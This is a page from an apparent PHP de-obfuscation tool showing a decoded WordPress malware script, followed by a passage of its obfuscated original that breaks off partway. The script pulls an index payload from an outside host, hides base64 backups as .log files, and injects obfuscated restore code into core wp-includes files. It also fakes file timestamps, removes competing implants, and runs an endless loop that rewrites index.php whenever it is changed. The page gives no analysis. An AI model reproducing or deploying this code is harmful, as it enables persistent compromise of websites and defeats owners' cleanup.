Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
"\x48TT\x50_H\x4fST"<?php header('Access-Control-Allow-Origin:*'); error_reporting(E_ALL..
Decoded Output download
"HTTP_HOST"<?php
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5;
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "http://s.newnday.xyz/";
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
echo $root.'<br/>';
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
function insertAfterTarget($fileCont, $insertCont, $target)
{
$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
function delTargetLine($fileCont, $target)
{
//$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n");
$AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($preChLineIndex !== false && $AfterChLineIndex !== false) {
$fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1);
// $fp = fopen($filePath, "w+");
// fwrite($fp, $result);
// fclose($fp);
}
}
return $fileCont;
}
function insertBeforeTarget($fileCont, $insertCont, $target)
{
$targetIndex = strrpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n");
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
function genRandomString($length, &$usedStrings) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$nummax=50;
$string = '';
// for ($i = 0; $i < $length; $i++) {
// $string .= $characters[mt_rand(0, strlen($characters) - 1)];
// }
$string = $characters[mt_rand(0, strlen($characters) - 1)];
$num=mt_rand(0,$nummax);
$string .=$num;
if (in_array($string, $usedStrings)) {
return genRandomString($length, $usedStrings);
} else {
$usedStrings[] = $string;
return $string;
}
}
function strto16($string)
{
$arr1 = str_split($string, 1);
$num=0;
foreach ($arr1 as $akey => $aval) {
if($num%3==0)
{
$arr1[$akey] = "\x" . bin2hex($aval);
}
else
{
$arr1[$akey] =trim($aval);
}
$num=$num+1;
}
$arr1str=implode('',$arr1);
return $arr1str;
}
function getx($url)
{
if (stripos($url, 'http') !== false) {
$content = urla($url);
} else {
$content = file_get_contents($url);
}
return $content;
}
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function gfiocheck($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json; charset=utf-8',
'User-Agent: googlebot'
));
$data = curl_exec($curl);
if(strpos($data,'ok') !== false && ( strpos($data,'createseo.xyz') !== false || strpos($data,'fortuneday.xyz') !== false )){
return true;
}
else
{
return false;
}
}
function auto_restore_file()
{
global $fp2, $root,$gov,$mode,$domain,$http,$host;
$index_path = $root . '/index.php';
$auto_restore_staus=1;
$arr_msg = array();
$inde_content_hou="<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );";
$index_content = @file_get_contents($index_path);
if(!$index_content)
{
$index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx');
if($index_content)
{
$index_content=$index_content."\n".$inde_content_hou;
}
else
{
$auto_restore_staus=0;
}
}
if($auto_restore_staus)
{
$index_size = strlen($index_content);
$b64_index_content = base64_encode($index_content);
$wordpress_include_path = $root . '/wp-includes/';
$arr_wordpress_filename = array(
// 'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
//'template.php' => 'function get_archive_template',
//'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
//'nav-menu.php' => 'function is_nav_menu_item',
//'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10);
$hidden_code_template ="//c_start
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\";
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global \$gov;if (!\$gov) {
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#'; if (\$f_exists(\$bk_idx_path)){
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }
}
//c_end"."\n";
$wordpress_content_path = $root . '/wp-content/';
$wordpress_content_cache= $root . '/wp-content/cachef.php';
$bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path, $b64_index_content);
$new_content1='';
$bk_index_path1=$root.'/'.$bk_index_path;
$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template);
$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code);
$hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code);
$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code);
$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code);
$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code);
$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code);
$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code);
$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>');
if (!$putcache)
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.';
}
else
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.';
@touch($wordpress_content_cache, strtotime("-260 days", time()));
}
foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) {
$needle = $arr_wordpress_filename[$wordpress_filename];
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
$bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path3, $b64_index_content);
$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template);
$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template);
$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template);
$new_content = str_replace($needle, $hidden_code . $needle, $old_content);
$new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content);
$fileoldtime=filectime($wordpress_filepath);
@chmod($wordpress_filepath, 438);
@unlink($wordpress_filepath);
$success = @file_put_contents($wordpress_filepath, $new_content1);
touch($wordpress_filepath,$fileoldtime);
$arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
else
{
$arr_msg[] ='hide code fail';
}
return $arr_msg;
}
function crack_auto_restore()
{
global $root;
$arr_wordpress_filename = array(
'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
'template.php' => 'function get_archive_template',
'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
'nav-menu.php' => 'function is_nav_menu_item',
'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$wordpress_include_path = $root . '/wp-includes/';
$arr_msg = array();
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = @file_get_contents($wordpress_filepath);
if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) {
$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content);
file_put_contents($wordpress_filepath, $new_content);
$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath;
}
}
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) {
$new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content);
$success = @file_put_contents($wordpress_filepath, $new_content);
$arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
// if (file_exists('wp-includes/fonts/dashicons.ttc')) {
// @unlink('wp-includes/fonts/dashicons.ttc');
// $arr_msg[] = "delete ttc ok";
// }
// if (file_exists('wp-admin/images/browser-tiny.png')) {
// @unlink('wp-admin/images/browser-tiny.png');
// $arr_msg[] = "delete png ok";
// }
$arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'");
$arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {");
return $arr_msg;
}
function cleancroncode($file, $startstr, $endstr)
{
$msg = 'cron no code';
if (file_exists($file)) {
$ma = file_get_contents($file);
$start = strpos($ma, $startstr);
if ($start !== false) {
$head = substr($ma, 0, $start - 1);
$end = strpos($ma, $endstr);
$foot = substr($ma, $end);
file_put_contents($file, $head . $foot);
$msg = 'clear cron code';
} else {
$msg = 'cron no code';
}
}
return $msg;
}
function insertcroncode($file, $src, $beforetag)
{
// code
$c = file_get_contents($file);
$pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c));
if ($pn) {
$msg = "line of $file ok";
} else {
$msg = "line of $file fail";
}
return $msg;
}
function output_message($result, $message_type = 'html', $html_tag = 'li')
{
if ($message_type != 'html') {
echo json_encode($result);
return;
}
if (!is_array($result)) {
return;
}
if (!isset($result['title'])) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
if (sizeof($result['message']) > 0) {
foreach ($result['message'] as $message) {
$message = str_replace('success', '<font color="blue">success</font>', $message);
$message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
$message = str_replace('fail', '<font color="red">fail</font>', $message);
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if (isset($result['status']) && !empty($result['status'])) {
if ($result['status'] == 'ok') {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ($result['status'] == 'fail') {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
echo "<br />";
}
function fi1($path)
{
global $root, $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != "..") {
$pfile = $path . "/" . $file;
if (is_dir($pfile) && !is_link($pfile)) {
if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
fi1($pfile);
}
if (!file_exists($pfile . "/index.php")) {
array_push($arpath8, str_replace($root . '/', '', $pfile));
}
}
}
}
}
shuffle($arpath8);
}
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function rand_abc($length)
{
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
function file_get_https($url, $timeout)
{
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false,
),
'http' => array(
'method' => "GET",
'timeout' => $timeout,
),
);
@file_get_contents($url, false, stream_context_create($arrContextOptions));
}
function auto_restore_cycle()
{
$arr_msg = array();
$code ="<?php set_time_limit(99 - 99);
ignore_user_abort(1);
function auto_restore_memory()
{
\$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php';
\$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
@unlink(\$flag_filename);
\$index_code = @file_get_contents(\$index_path);
while (1) {
clearstatcache();
if (file_exists(\$flag_filename)){
break;
}
if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) {
@chmod(\$index_path, 438);
@unlink(\$index_path);
@file_put_contents(\$index_path, \$index_code);
@chmod(\$index_path, 292);
}
sleep(2);
}
}
ob_end_clean();
header(\"Connection: close\");
ob_start();
echo 888;
header(\"Content-Length: \" . ob_get_length());
ob_end_flush();
flush();
auto_restore_memory(); ?>";
$file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
$success = @file_put_contents($file_path, $code);
$arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
if (!$success) {
return $arr_msg;
}
$protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
file_get_https($file_url, 3);
$arr_msg[] = 'get: ' . $file_url . ' ok';
$success = @unlink($file_path);
$arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
return $arr_msg;
}
function hiddenma()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (is_dir("wp-includes") && is_dir("wp-admin")) {
// if (file_exists("wp-config.php")) {
// $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true);
// $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false);
// }
$arr_msg = crack_auto_restore();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
$arr_msg = auto_restore_file();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef'));
$check_ginfo_url=$http.'://'.$host.'/?ginfo';
$check_staus=gfiocheck($check_ginfo_url);
if($check_staus)
{
$return_result['message'][] = 'ginfo:ok';
}
$arr_msg = auto_restore_cycle();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
}
return $return_result;
}
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "http://s.newnday.xyz/";
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
$arpath8 = array();
fi1($root);
$fp2 = @fp2($root);
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
$hiddenma_result = hiddenma(); // 4
output_message($hiddenma_result, $message_type);
?>Did this file decode correctly?
Original Code
"\x48TT\x50_H\x4fST"<?php
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 5;
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
echo $root.'<br/>';
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
function insertAfterTarget($fileCont, $insertCont, $target)
{
$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
function delTargetLine($fileCont, $target)
{
//$fileCont = file_get_contents($filePath);
$targetIndex = strpos($fileCont, $target);
if ($targetIndex !== false) {
$preChLineIndex = strrpos(substr($fileCont, 0, $targetIndex + 1), "\n");
$AfterChLineIndex = strpos(substr($fileCont, $targetIndex), "\n") + $targetIndex;
if ($preChLineIndex !== false && $AfterChLineIndex !== false) {
$fileCont = substr($fileCont, 0, $preChLineIndex + 1) . substr($fileCont, $AfterChLineIndex + 1);
// $fp = fopen($filePath, "w+");
// fwrite($fp, $result);
// fclose($fp);
}
}
return $fileCont;
}
function insertBeforeTarget($fileCont, $insertCont, $target)
{
$targetIndex = strrpos($fileCont, $target);
if ($targetIndex !== false) {
$chLineIndex = strrpos(substr($fileCont, 0, $targetIndex), "\n");
if ($chLineIndex !== false) {
$fileCont = substr($fileCont, 0, $chLineIndex + 1) . $insertCont . "\n" . substr($fileCont, $chLineIndex + 1);
}
}
return $fileCont;
}
function genRandomString($length, &$usedStrings) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$nummax=50;
$string = '';
// for ($i = 0; $i < $length; $i++) {
// $string .= $characters[mt_rand(0, strlen($characters) - 1)];
// }
$string = $characters[mt_rand(0, strlen($characters) - 1)];
$num=mt_rand(0,$nummax);
$string .=$num;
if (in_array($string, $usedStrings)) {
return genRandomString($length, $usedStrings);
} else {
$usedStrings[] = $string;
return $string;
}
}
function strto16($string)
{
$arr1 = str_split($string, 1);
$num=0;
foreach ($arr1 as $akey => $aval) {
if($num%3==0)
{
$arr1[$akey] = "\x" . bin2hex($aval);
}
else
{
$arr1[$akey] =trim($aval);
}
$num=$num+1;
}
$arr1str=implode('',$arr1);
return $arr1str;
}
function getx($url)
{
if (stripos($url, 'http') !== false) {
$content = urla($url);
} else {
$content = file_get_contents($url);
}
return $content;
}
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function gfiocheck($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // https hosts
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json; charset=utf-8',
'User-Agent: googlebot'
));
$data = curl_exec($curl);
if(strpos($data,'ok') !== false && ( strpos($data,'createseo.xyz') !== false || strpos($data,'fortuneday.xyz') !== false )){
return true;
}
else
{
return false;
}
}
function auto_restore_file()
{
global $fp2, $root,$gov,$mode,$domain,$http,$host;
$index_path = $root . '/index.php';
$auto_restore_staus=1;
$arr_msg = array();
$inde_content_hou="<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );";
$index_content = @file_get_contents($index_path);
if(!$index_content)
{
$index_content = getx($domain . $gov . '/' . $gov . '.' . $mode . '.idx');
if($index_content)
{
$index_content=$index_content."\n".$inde_content_hou;
}
else
{
$auto_restore_staus=0;
}
}
if($auto_restore_staus)
{
$index_size = strlen($index_content);
$b64_index_content = base64_encode($index_content);
$wordpress_include_path = $root . '/wp-includes/';
$arr_wordpress_filename = array(
// 'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
//'template.php' => 'function get_archive_template',
//'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
//'nav-menu.php' => 'function is_nav_menu_item',
//'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$arr_rand_wordpress_filename = array_rand($arr_wordpress_filename, 10);
$hidden_code_template ="//c_start
\$f_exists =\"file_exists\"; \$ch = \"chmod\"; \$tou = \"touch\";
\$delete ='un'.'link';\$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts';
\$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global \$gov;if (!\$gov) {
\$bs_dec = \"base64_decode\"; \$idx_path = \$_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; \$bk_idx_path = '#bk_idx_path#'; if (\$f_exists(\$bk_idx_path)){
@\$ch(\$idx_path, 0644); \$idx_code=\$f_get(\$bk_idx_path); \$f_result=\$f_put(\$idx_path,\$bs_dec(\$idx_code));@\$ch(\$idx_path, 0444); }
}
//c_end"."\n";
$wordpress_content_path = $root . '/wp-content/';
$wordpress_content_cache= $root . '/wp-content/cachef.php';
$bk_index_path = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path, $b64_index_content);
$new_content1='';
$bk_index_path1=$root.'/'.$bk_index_path;
$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template);
$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code);
$hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code);
$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code);
$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code);
$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code);
$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code);
$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code);
$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>');
if (!$putcache)
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.';
}
else
{
$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.';
@touch($wordpress_content_cache, strtotime("-260 days", time()));
}
foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) {
$needle = $arr_wordpress_filename[$wordpress_filename];
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = file_get_contents($wordpress_filepath);
$bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
@file_put_contents($bk_index_path3, $b64_index_content);
$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template);
$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template);
$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template);
$new_content = str_replace($needle, $hidden_code . $needle, $old_content);
$new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content);
$fileoldtime=filectime($wordpress_filepath);
@chmod($wordpress_filepath, 438);
@unlink($wordpress_filepath);
$success = @file_put_contents($wordpress_filepath, $new_content1);
touch($wordpress_filepath,$fileoldtime);
$arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
}
}
else
{
$arr_msg[] ='hide code fail';
}
return $arr_msg;
}
function crack_auto_restore()
{
global $root;
$arr_wordpress_filename = array(
'blocks.php' => 'function register_block_style_handle',
'theme.php' => 'function validate_current_theme',
'template.php' => 'function get_archive_template',
'rewrite.php' => 'function url_to_postid',
'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
'rest-api.php' => 'function register_rest_field',
'media.php' => 'function image_downsize',
'nav-menu.php' => 'function is_nav_menu_item',
'theme-templates.php' => 'function wp_enable_block_templates',
'block-template.php' => 'function _strip_template_file_suffix',
'blocks/archives.php' => 'function render_block_core_archives',
'category.php' => 'function get_cat_name',
'load.php' => 'function is_wp_error',
'plugin.php' => 'function do_action_ref_array',
'query.php' => 'function is_front_page',
'cron.php' => 'function wp_schedule_event',
);
$wordpress_include_path = $root . '/wp-includes/';
$arr_msg = array();
foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
if (!file_exists($wordpress_filepath)) {
continue;
}
$old_content = @file_get_contents($wordpress_filepath);
if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) {
